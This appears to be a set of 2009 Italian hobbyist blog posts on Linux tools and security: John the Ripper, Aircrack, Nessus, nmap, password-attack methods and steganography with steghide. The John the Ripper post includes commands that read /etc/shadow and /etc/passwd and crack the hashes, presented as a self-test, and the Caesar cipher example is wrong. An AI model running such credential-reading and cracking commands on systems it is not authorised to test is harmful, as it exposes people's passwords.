Infatti ce la possibilità che l'hacker sia fortunato e ci impieghi 30 anni invece che 100 è allora?Usiamo la password sicura per sempre con un periodo di crack che supera i 1000 anni.Adesso che abbiamo una base teorica vediamo qualche esempio pratico.

Gli esempi sono basati su 100 tentativi al secondo.

Ecco il link di uno dei piu famosi blog specializzati in password cracking .

Video Aircrack-NG wpa crack..aspettando il tutorial

2009-08-27T04:19:00.000+02:00

Aspettando che il nostro amico C posti la guida dettagliata ecco un video che mostra l'insicurezza delle rete wifi.Il video è realizzato usando la famosa distribuzione per i test di sicurezza Backtrack.

Aircrack

Slackware For Dummies

2009-08-27T02:30:00.003+02:00

Continuiamo a parlare della distro slackware più precisamente di un documento "Slackware For Dummies ".Diversamente dal titolo il file è interamente in italiano ed è composto da ben 338 pagine dove vengono affrontate diverse problematiche.Progetto gestito da Mauro Sacchetto è destinato sopratutto ai nuovi utenti della distro ;nelle prime pagine si affronta tutto il processo dell'installazione per poi passare a diversi aspetti della configurazione come ad esempio:mouse, scanner, X.org, stampanti.In fine vengono spiegate le caratteristiche principali e le differenze dalle altre distribuzioni.

Slackware For Dummies

Guida John The Ripper

2009-08-27T01:00:00.002+02:00

Questo mini tutorial è solo a scopo didattico John The Ripper viene utilizzato per verificare la robustezza della proprio password.

Bene iniziamo con l’installare il programma sulla nostra macchina Slackware.(In altre distribuzioni tipo debian il tool è facilmente reperibile dai repository) Apriamo il terminale e digitiamo:

#slapt-get --search John

E poi proseguiamo con l'installazione

#slapt-get --i john-1.7.3.1-i486-2as

Per chi non usa slapt-get scaricate il file tgz qui e da terminale digitate:

#installpkg 'percorso del file da installare'

A questo punto controlliamo che l'installazione è andata a termine:

#john -test

Il risultato sarà:

#Benchmarking: Traditional DES [24/32 4K]... DONE
Many salts:     261427 c/s real, 277523 c/s virtual
Only one salt: 247577 c/s real, 262264 c/s virtual

Benchmarking: BSDI DES (x725) [24/32 4K]... DONE
Many salts:     9259 c/s real, 9725 c/s virtual
Only one salt: 9220 c/s real, 9239 c/s virtual

Benchmarking: FreeBSD MD5 [32/32]... DONE
Raw:    6268 c/s real, 6357 c/s virtual

Benchmarking: OpenBSD Blowfish (x32) [32/32]... DONE
Raw:    383 c/s real, 394 c/s virtual

Benchmarking: Kerberos AFS DES [24/32 4K]... DONE
Short: 246016 c/s real, 260610 c/s virtual
Long:   667950 c/s real, 703031 c/s virtual

Benchmarking: LM DES [32/32 BS]... DONE
Raw:    4090K c/s real, 4131K c/s virtual

Adesso prima di testare la password del nostro sistema aggiungiamo la password nel dizionario di John cosi siamo sicuri che il processo abbia risultato positivo quindi da terminale:

#cd /usr/share/john
#nano /usr/share/john/password.lst //aggiungiamo qui la password

Adesso dobbiamo copiarci il contenuto dei file /etc/shadow ed /etc/passwd diamo quindi il seguente comando:

#./unshadow /etc/passwd /etc/shadow > passwd1

Adesso abbiamo creato il file che john dovrà "decifrare" adesso non ci manca altro che lanciare john:

#./john –single passwd1

Download di musica libero e gratuito - Jamendo

2009-08-26T16:24:00.004+02:00

http://www.jamendo.com/it/

Per chi ancora non sappia cosa sia jamendo, è un sito che permette di scaricare gratuitamente direttamente dal sito o tramite BitTorrent in formato .mp3 o .ogg musica sotto licenza Creative
Commons.
Certo se ascoltate poca musica e preferite soltanto le ultime hit del momento dei grandi artisti (?) e case discografiche questo non fa per voi perchè non c'è li troverete(per quello esiste il "caro" P2P).
Mentre se state ore a sentire musica o non vi va di essere chiamati ladri solo per aver scaricato due brani Jamendo è il sito giusto dove scoprire nuovi talenti musicali, sapendo che pagare non è sempre sinonimo di qualità e di origininalità.

Nel sito è presente inoltre una classifica delle canzoni più ascoltati, radio suddivise per generi, inoltre se siete musicisti anche voi potere iscrivere a Jamendo per caricare le canzoni composte da voi.

OpenCola quando il drink diventa open

2009-08-26T02:43:00.002+02:00

La cola meglio conosciuta come Coca-cola grazie al successo dovuto da una delle maggiori società produttrici: The Coca-Cola Company.Tutti sapranno che la ricetta della Coca Cola è segreta,ma da oggi grazie al progetto open cola ogniuno di noi ha la possibilità di crearsi la proprio cola fatta in casa :D.

Ricetta OpenCola

Hack password

2009-08-26T01:45:00.006+02:00

Come hackerare le password:
Ci sono ben 5 metodi diversi per ottenere una password...quali sono? Proviamo a vederli insieme.

1)Chiederla.Può sembrare un modo stupido, ma in realtà è uno dei metodi più potenti ed efficace,basta pensare il mitico Kevin Mitnick e l'ingegneria sociale.

2)Indovinarla.Anche questo secondo metodo sembra futile.A chi di voi non è mai capitato di usare come password la propria data di nascita o il nome del proprio animale domestico o semplicemte il proprio nome o la stessa parola "password" ...molte persone utilizzano questo genere di password perchè sono facili da ricordare, ma per niente sicure ;)

3)Attacco di forza bruta.Molto semplice da fare ma se la nostra password è lunga e presenta anche simboli questo tipo di attacco richiederebbe anche decenni per arrivare alla soluzione,infatti l'attacco consiste nel provare tutte le combinazioni possibili.

4)Attacco con parole comuni.Semplice forma di brute force,ma in questo caso invece di provare tutte le combinazioni " l'hacker" prova a loggarsi con parole di senso compiuto.

5)Attacco con dizionario.Simile all'attacco numero 4, ma in questo caso "l'hacker" prova interi dizionari alcuni dei quali superano i 2GB di dimensione...milioni di parole :D.

A breve un prossimo post per creare password sicure ;)

Slackware 12.2 driver nVidia

2009-08-26T01:07:00.003+02:00

Questa è il mio primo post/tutorial che riguarda la mia dstribuzione linux preferetia;si è proprio slackware.Vediamo come installare i driver nVidia sulla versione 12.2 di slackware per poter giocare per esempio a EnemyTerritory un bellissimo gioco free sparatutto online. (mi troverete con il nick Millex :D).

1)Prima di tutto scarichiamo i driver per la nostra scheda video da
http://www.nvidia.com/object/unix.html.
2)Dopo aver scaricato i river spostiamoci nella directory dove abbiamo scaricato il file(che dovrebbe chiamarsi NVIDIA-Linux-x86-versione-pkg1.run) e modifichiamo i permessi in modo da rendere eseguibile l’installer.A questo punto apriamo il terminale e da root digitiamo:

#chmod 755 NVIDIA-Linux-x86-versione-pkg1.run

3)Terminiamo l’ambiente grafico e logghiamoci da terminale come root.
Spostiamoci nuovamente nella directory dove si trova l’eseguibile e facciamo partire con:

#./NVIDIA-Linux-x86-versione-pkg1.run

Durante l’installazione vi verrà chiesto di ricompilare il kernel(opzione consigliata), e dopo se vogliamo che modifichi il file xorg.conf, accettiamo e concludiamo l’installazione.
A questo punto riavviamo il pc e se l’installazione è andata a buon fine apparirà il logo nVidia durante il caricamento dell’ambiente grafico.

Video tutorial Nessus

2009-08-26T00:34:00.003+02:00

Nessus è probabilmente il più completo vulnerability scanning disponibile nel mondo open source rilasciato sotto licenza GPL.A breve posterò un guida completa su nessus dove vedremo in maniare più approfondita il funzionamento dello scan.Adesso potete iniziare a fare i vostri primi esperimenti seguendo questo utile videotutorial.

Lezione Nessus

Millex ;)

Steganografia teoria più esempio pratico

2009-08-25T03:44:00.010+02:00

Tempo fa scrissi un articolo che riguardava un argomento molto interessante,ma che pochi conoscono la steganografia.In questa seconda revisione del mio tutorial ho aggiunto un esempio pratico di per notare le potenzialità di questa "tecnica".

Navigando in rete ho preso coscienza della poca chiarezza sulla steganografia in particolar modo la confusione che vi è tra steganografia e crittografia. Cos’è quindi la steganografia? Partiamo col definire l’ etimologia della parola: steganografia deriva dal greco “scrittura nascosta”.

L’arte di inviare messaggi codificati ha origini antichissime: partendo dalle tecniche usate dai greci fino ad oggi ed è ,inoltre, in continua evoluzione,infatti come afferma

Navigando in rete ho preso coscienza della non chiarezza sulla steganografia in particolar modo la confusione che vi è tra steganografia e crittografia. Cos’è quindi la steganografia? Partiamo col definire l’ etimologia della parola: steganografia deriva dal greco “scrittura nascosta”.

L’arte di inviare messaggi codificati ha origini antichissime: partendo dalle tecniche usate dai greci fino ad oggi ed è ,inoltre, in continua evoluzione,infatti come afferma Neil F. Johnson siamo solo limitati dalla nostra immaginazione perchè i dati e i messaggi possono essere sfruttati in infiniti modi per nascondere all’interno altre informazioni.

Nonostante in entrambe le tecniche riscontriamo elementi comuni, la crittografia ha lo scopo di “modificare” un messaggio per renderlo illeggibile a persone estranee, la finalità della steganografia, al contrario, ha lo scopo di nascondere l’intero messaggio.

Apparentemente un messaggio inviato con la tecnica steganografica risulta una semplice immagine o una canzone o un file video, in realtà esso nasconde il vero e proprio messaggio che il mittente ha voluto inviare al proprio destinatario.

Uno dei vantaggi fondamentali legati alla steganografia è che non desta sospetti, mentre nella crittografia il file codificato può essere visto da tutti e quindi destare sospetti, nella steganografia il messaggio è completamente occultato. Lo svantaggio di tale tecnica è la struttura stessa delle steganografia, infatti se il messaggio venisse scoperto, rileverebbe interamente il messaggio, ergo, a volte, per ovviare a questo problema si combinano entrambe le tecniche in modo da avere difficoltà nel codificare il vero mesaggio perchè e stato crittografato.

Adesso facciamo un esempio pratico di come criptare un testo tramite l’utilizzo di uno dei più semplici algoritmi di crittografia: il cifrario di Cesare.

Testo non criptato: a b c d e f g h i l m n o p q r s t u v z

Testo crittografato: d e f g h i l m n o p q r s t u v z a b c

Rimanendo fedeli al algoritmo originario usato da Cesare la chiave utilizzata e di 3, infatti ogni lettere dell alfabeto viene scalata di tre posizioni. Proviamo adesso a creare un testo crittografato utilizzando la tabella precedente.

Testo non criptato: crittami

Testo criptato: funzzdpn

Vediamo adesso come procedere per inviare un file con la tecnica della steganografia. Come primo processo bisogna comprimere il nostro messaggio tramite un algoritmo apposito. Gli algoritmi più conosciuti e diffusi sono:

Una volta compresso il messaggio bisogna nasconderlo all’interno di un altro file. Per fare questo vengono utilizzate soprattutto tre tecniche:

Iniezione;
Sostituzione;
Generazione.

Il metodo iniettivo consiste nell’inserire in un messaggio contenitore un altro messaggio, messaggio che risulterà assolutamente invisibile agli occhi.

Il metodo sostitutivo, come fa intuire la parola stessa, consiste nel rimpiazzare bit secondari del file con bit contenenti il messaggio. Il vantaggio di questa tecnica è che non comporta, a differenza dell’inezione, modifiche nella dimentsione del file, ma questo porta a una perdita di qualità del file stesso.

Il metodo della generazione, a differenza delle precedenti tecniche non modica ma crea un file di copertura “ad hoc” contenente il messaggio nascosto.

E’ possibile trovare alcuni alcuni programmi di steganografia su questi link:

http://steghide.sourceforge.net/

http://www.outguess.org/

http://www.darkside.com.au/snow/

http://www.mirrors.wiretapped.net/security/steganography/jphs/

Adesso proviamo a nascondere un file di testo all'interno di un immagine utilizzando "steghide" su Debian.Bene come prima cosa apriamo il terminale e installiamo il programma quindi digitiamo:

#apt-get install

Adesso vogliamo che il messaggio all'interno di informazione.txt venga nascosto nell'immagine gioconda.jpg.

#steghide embed -cf /percoso/percorso/gioconda.jpg -ef /percorso/percorso/informazione.txt

A questo punto vi verra chiesta una password la stessa che il vostro destinatario dovrà conoscere per "decriptare il messaggio".Nel nostro caso la passord è "prova",dopo aver confermato la pwd il messaggio verà nascosto.

Chi riceve immagine da terminale dovra digitare:

#steghide extract -sf 'percorso/percorso/gioconda.jpg

Dopo aver inserito la password nella nostra home apparirà il file informazione.txt con all'interno il messaggio ;).

Bene come potete vedere qui sotto ci sono due bellissimi ritratti della gioconda,ma mentre immagine a sinistra non contiene nessuna informazione quella a destra contiene il file informazione.txt all suo interno.Provate vosi stessi a decifrate immaggine.(ricordo che la pwd usata è "prova")

IMPORTANTE:per fare la prova l'immagine deve essere scaricata con le dimensione iniziali quindi il link per salvare l'immagine di destra è questo mentre per l'immagine a sinistra qui ;).

Nmappa

2009-08-25T02:12:00.001+02:00

Usi nmap,ma non conosci nel profondo le potenzialità di questo "divertente" software?Posto due lezioni fatte in flash che possono essere un valido inizio.

Lezione 1
Lezione 2